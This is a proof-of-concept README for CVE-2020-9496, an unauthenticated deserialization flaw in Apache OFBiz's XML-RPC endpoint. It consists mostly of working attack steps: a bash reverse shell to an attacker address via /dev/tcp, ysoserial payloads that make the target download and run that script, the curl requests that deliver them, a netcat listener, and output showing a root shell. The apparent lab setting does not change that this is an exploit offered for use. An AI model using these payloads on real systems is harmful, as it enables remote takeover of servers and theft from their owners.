README.md

CVE-2020-9496 - RCE

Because the 2 xmlrpc related requets in webtools (xmlrpc and ping) are not using authentication they are vulnerable to unsafe deserialization. This issue was reported to the security team by Alvaro Munoz pwntester@github.com from the GitHub Security Lab team.

This vulnerability exists due to Java serialization issues when processing requests sent to /webtools/control/xmlrpc. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted request. Successful exploitation would result in arbitrary code execution.

Affected Version 17.12.01

Fixed Versions 18.12.01, 17.12.04

Original Blog: https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz/

For this POC to work we need to drop a shell script and execute/access that file via curl.

STEP 1: Create A Shell File With Bash One-liner With Your IP Address & Port Address.

$ cat shell.sh
#!/bin/bash
/bin/bash -i >& /dev/tcp/10.10.x.x/1337 0>&1

STEP 2: Now We Need To Make This File Available via HTTP Service

$ sudo python3 -m http.server 80

STEP 3: Generate Payload via ysoserial - Change IP

$ ysoserial CommonsBeanutils1 "wget 10.10.x.x/shell.sh -O /tmp/shell.sh" | base64 | tr -d "\n"

STEP 4: Copy The Output of Your Payload - Very Long String

rO0ABXNyABdqYXZhLnV0..........................................................AAAACABQAEQAAAAoAAQACABYAEAAJcHQABFB3bnJwdwEAeHEAfgANeA==

STEP 5: Use the below curl command to execute our payload. Paste payload after extensions”>

$ curl https://127.0.0.1:8443/webtools/control/xmlrpc -X POST -v -d '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">rO0ABXNyABdqYXZhLnV0..........................................................AAAACABQAEQAAAAoAAQACABYAEAAJcHQABFB3bnJwdwEAeHEAfgANeA==</serializable></value></member></struct></value></param></params></methodCall>' -k  -H 'Content-Type:application/xml'

Curl Command Without Payload For Your Reference

$ curl https://127.0.0.1:8443/webtools/control/xmlrpc -X POST -v -d '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions"></serializable></value></member></struct></value></param></params></methodCall>' -k  -H 'Content-Type:application/xml'

Make Sure Whether You Got A Hit On HTTP Server After Curl Command Execution

$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.x.x - - [29/Apr/2021 12:57:07] "GET /shell.sh HTTP/1.1" 200 -

As you can see we got a hit on our HTTP server. File has been downloaded to /tmp directory named as shell.sh. Now to execute that file create payload again. But before you do that start a netcat listener.

STEP 6: Start NetCat Listener

$ nc -lvnp 1337
listening on [any] 1337 ...

STEP 7: Create Payload To Execute Previously Downloaded Shell Script

$ ysoserial CommonsBeanutils1 "bash /tmp/shell.sh" | base64 | tr -d "\n"

STEP 8: Copy & Paste The Output Inside Curl Command & Execute It

curl https://127.0.0.1:8443/webtools/control/xmlrpc -X POST -v -d '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">rO0ABXNyABdqYXZhLnV0..........................................................AAAACABQAEQAAAAoAAQACABYAEAAJcHQABFB3bnJwdwEAeHEAfgANeA==</serializable></value></member></struct></value></param></params></methodCall>' -k  -H 'Content-Type:application/xml'

STEP 10: Check NetCat Listener For Reverse Connection

$ nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.x.x] from (UNKNOWN) [10.129.x.x] 60006
bash: cannot set terminal process group (30): Inappropriate ioctl for device
bash: no job control in this shell
root@test:/usr/src/apache-ofbiz-17.12.01# id
id
uid=0(root) gid=0(root) groups=0(root)